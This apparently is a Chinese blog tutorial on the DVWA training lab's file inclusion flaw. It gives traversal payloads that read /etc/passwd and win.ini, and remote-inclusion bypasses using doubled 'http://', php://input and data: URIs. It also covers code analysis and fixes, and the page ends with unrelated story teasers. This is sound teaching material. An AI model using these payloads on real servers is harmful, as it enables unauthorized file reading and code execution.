05. DVWA之文件包含

漏洞概述

文件包含是指應(yīng)用程序加載的文件(本地/遠(yuǎn)程)可以由用戶(hù)提交的數(shù)據(jù)控制恢暖,從而導(dǎo)致攻擊者控制惡意文件在服務(wù)器上執(zhí)行

測(cè)試工具

firefox瀏覽器厉亏,firefox插件new hackbar

測(cè)試方法

LOW級(jí)別

  1. 設(shè)置DVWA安全級(jí)別為L(zhǎng)OW

  2. 使用瀏覽器發(fā)起本地文件包含攻擊

    payload:

    • ../../../../../../../../../../etc/password

    • c:\\\\windows\\win.ini

    05.01.png
  3. 使用瀏覽器發(fā)起遠(yuǎn)程文件包含攻擊

    05.02.png
    05.03.png
    05.04.png
  4. 代碼分析

    05.05.png

    說(shuō)明:

    代碼直接讀取page參數(shù)同時(shí)使用include進(jìn)行文件包含執(zhí)行

MEDIUM級(jí)別

  1. 設(shè)置DVWA安全級(jí)別為Medium

  2. 使用瀏覽器發(fā)起本地文件包含攻擊

    payload:

    • …/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/password
    • ….//….//….//….//….//….//….//….//….//….//etc/password
  3. 使用瀏覽器發(fā)起遠(yuǎn)程文件包含攻擊

    payload:

    • hthttp://tp://localhost:9999/file_include_low.php
    • php://input <?php phpinfo();
    • data:text/plain;charset=utf-8,<?php phpinfo();
    05.06.png
    05.07.png
  4. 代碼分析

    05.08.png

    說(shuō)明:

    清除page參數(shù)中的http://鹏秋、https://亥至、../妹笆、..\字符串, 可以使用php://input麻昼,php://filter, data url schema等進(jìn)行注入踱蛀,也可使用替換邏輯漏洞(只替換一次)將被替換字符串迭代使用窿给,例如hthttp://tp://被替換后為http://

HIGH級(jí)別

  1. 設(shè)置DVWA安全級(jí)別為High

  2. 代碼分析

    05.09.png

    說(shuō)明:

    對(duì)提交參數(shù)進(jìn)行檢查,只允許include.php以及file開(kāi)頭的文件被包含率拒,只能包含本地file開(kāi)頭的文件或配合文件上傳漏洞組合進(jìn)行利用

修復(fù)建議

  1. 使用白名單列表限制被包含文件

  2. 關(guān)閉遠(yuǎn)程文件包含功能

  3. 避免web服務(wù)器啟動(dòng)用戶(hù)權(quán)限過(guò)高

歡迎添加公眾號(hào)【扯淡er】學(xué)習(xí)交流

扯淡er
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末崩泡,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子猬膨,更是在濱河造成了極大的恐慌角撞,老刑警劉巖,帶你破解...
    沈念sama閱讀 222,183評(píng)論 6 516
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件勃痴,死亡現(xiàn)場(chǎng)離奇詭異谒所,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)沛申,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,850評(píng)論 3 399
  • 文/潘曉璐 我一進(jìn)店門(mén)劣领,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人铁材,你說(shuō)我怎么就攤上這事尖淘。” “怎么了著觉?”我有些...
    開(kāi)封第一講書(shū)人閱讀 168,766評(píng)論 0 361
  • 文/不壞的土叔 我叫張陵村生,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我饼丘,道長(zhǎng)趁桃,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 59,854評(píng)論 1 299
  • 正文 為了忘掉前任葬毫,我火速辦了婚禮镇辉,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘贴捡。我一直安慰自己忽肛,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,871評(píng)論 6 398
  • 文/花漫 我一把揭開(kāi)白布烂斋。 她就那樣靜靜地躺著屹逛,像睡著了一般础废。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上罕模,一...
    開(kāi)封第一講書(shū)人閱讀 52,457評(píng)論 1 311
  • 那天评腺,我揣著相機(jī)與錄音,去河邊找鬼淑掌。 笑死蒿讥,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的抛腕。 我是一名探鬼主播芋绸,決...
    沈念sama閱讀 40,999評(píng)論 3 422
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼担敌!你這毒婦竟也來(lái)了摔敛?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 39,914評(píng)論 0 277
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤全封,失蹤者是張志新(化名)和其女友劉穎马昙,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體刹悴,經(jīng)...
    沈念sama閱讀 46,465評(píng)論 1 319
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡行楞,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,543評(píng)論 3 342
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了颂跨。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片敢伸。...
    茶點(diǎn)故事閱讀 40,675評(píng)論 1 353
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖恒削,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情尾序,我是刑警寧澤钓丰,帶...
    沈念sama閱讀 36,354評(píng)論 5 351
  • 正文 年R本政府宣布,位于F島的核電站每币,受9級(jí)特大地震影響携丁,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜兰怠,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,029評(píng)論 3 335
  • 文/蒙蒙 一梦鉴、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧揭保,春花似錦肥橙、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 32,514評(píng)論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)宠互。三九已至,卻和暖如春椭坚,著一層夾襖步出監(jiān)牢的瞬間予跌,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,616評(píng)論 1 274
  • 我被黑心中介騙來(lái)泰國(guó)打工善茎, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留券册,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 49,091評(píng)論 3 378
  • 正文 我出身青樓垂涯,卻偏偏與公主長(zhǎng)得像烁焙,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子集币,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,685評(píng)論 2 360

推薦閱讀更多精彩內(nèi)容